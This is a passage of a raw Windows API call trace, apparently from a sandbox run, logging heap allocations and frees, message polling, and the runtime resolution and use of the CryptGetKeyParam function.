hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d08 | out: hHeap=0x1780000) returned 1 [0096.745] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0096.745] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0096.745] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e24f0 [0096.745] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0096.745] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9fe0 [0096.745] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2500 [0096.746] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2500 | out: hHeap=0x1780000) returned 1 [0096.746] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca058 [0096.746] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0096.746] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f20 [0096.746] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2500 [0096.746] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f20 | out: hHeap=0x1780000) returned 1 [0096.746] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0096.746] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f50 [0096.746] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0096.746] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0096.746] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0096.746] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f38 [0096.746] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0096.746] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f20 [0096.746] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca088 [0096.746] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2330 [0096.746] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca088 | out: hHeap=0x1780000) returned 1 [0096.746] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0096.746] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca088 [0096.746] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0096.746] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ef0 [0096.746] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0096.746] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796ec8 [0096.746] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0096.746] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0a0 [0096.746] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0096.746] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2728 [0096.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca118 [0096.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2390 [0096.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca130 [0096.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0096.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ed8 [0096.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0096.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0096.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0096.747] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0096.747] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0096.747] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ed8 | out: hHeap=0x1780000) returned 1 [0096.747] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0096.747] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca130 | out: hHeap=0x1780000) returned 1 [0096.747] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0096.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0096.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0096.747] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0a0 | out: hHeap=0x1780000) returned 1 [0096.747] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0096.747] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ef0 | out: hHeap=0x1780000) returned 1 [0096.747] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca088 | out: hHeap=0x1780000) returned 1 [0096.747] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff40 | out: hHeap=0x1780000) returned 1 [0096.747] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0096.747] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0096.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0096.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca088 [0096.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2330 [0096.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0a0 [0096.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca130 [0096.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0096.748] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca130 | out: hHeap=0x1780000) returned 1 [0096.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01c0 [0096.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca130 [0096.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0096.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0096.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391bd0 [0096.748] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0096.748] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391bd0 | out: hHeap=0x1780000) returned 1 [0096.748] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0096.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9ed8 [0096.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0096.748] PeekMessageW (in: lpMsg=0x144e244, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e244) returned 0 [0096.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0096.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0096.748] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0096.748] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0096.748] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0096.748] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ed8 | out: hHeap=0x1780000) returned 1 [0096.748] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0096.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ef0 [0096.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0096.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ed8 [0096.748] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0096.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0096.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0096.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0096.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0096.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0096.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0096.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3a0 [0096.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0096.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0096.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0096.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0096.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0096.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0096.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0096.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0096.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0096.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0096.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0096.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0096.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0096.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0096.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0096.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d98 [0096.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01c0 | out: hHeap=0x1780000) returned 1 [0096.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0096.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0096.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796e88 [0096.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e28a8 [0096.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0096.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0096.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0096.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0096.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0096.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0096.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0096.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0096.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0096.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0170 [0096.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0096.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0096.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796d68 [0096.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2c08 [0096.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0096.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0096.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0096.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0096.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0096.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2c08 | out: hHeap=0x1780000) returned 1 [0096.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d68 | out: hHeap=0x1780000) returned 1 [0096.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0096.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0170 | out: hHeap=0x1780000) returned 1 [0096.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0096.751] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0096.751] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0096.751] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0096.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0096.751] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0096.751] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0096.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0096.751] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0096.751] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0096.751] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0096.751] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0096.751] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0096.751] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0096.751] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0096.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0096.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0096.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0096.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0096.751] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0096.751] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0096.751] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0096.751] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0096.751] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0096.751] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0096.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0096.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0096.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0096.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0096.751] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0096.751] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0096.752] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0096.752] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0096.752] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0096.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0096.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0096.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0096.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0096.752] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0096.752] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0096.752] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0096.752] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0096.752] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0096.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0096.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0096.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0096.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0096.752] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0096.752] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0096.752] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0096.752] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0096.752] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0096.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0096.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0096.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0096.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0096.752] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0096.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0096.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0096.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0096.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0096.753] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0096.753] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796ea8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0096.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0096.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0096.753] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0096.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00d0 | out: hHeap=0x1780000) returned 1 [0096.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0096.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0096.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0096.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0096.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0096.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0096.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe00 | out: hHeap=0x1780000) returned 1 [0096.753] CryptGetKeyParam (in: hKey=0x41ac100, dwParam=0x7, pbData=0x43e2700, pdwDataLen=0x144e260, dwFlags=0x0 | out: pbData=0x43e2700*=0x6610, pdwDataLen=0x144e260*=0x4) returned 1 [0096.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0096.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0096.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0096.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0096.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0096.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0096.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0096.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0096.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0096.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0096.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0096.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0096.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0096.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0096.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0096.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0096.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0096.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0096.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0096.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0096.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0096.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0096.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0096.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0096.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0096.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0096.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca130 | out: hHeap=0x1780000) returned 1 [0096.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ed8 | out: hHeap=0x1780000) returned 1 [0096.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ef0 | out: hHeap=0x1780000) returned 1 [0096.754] HeapFree 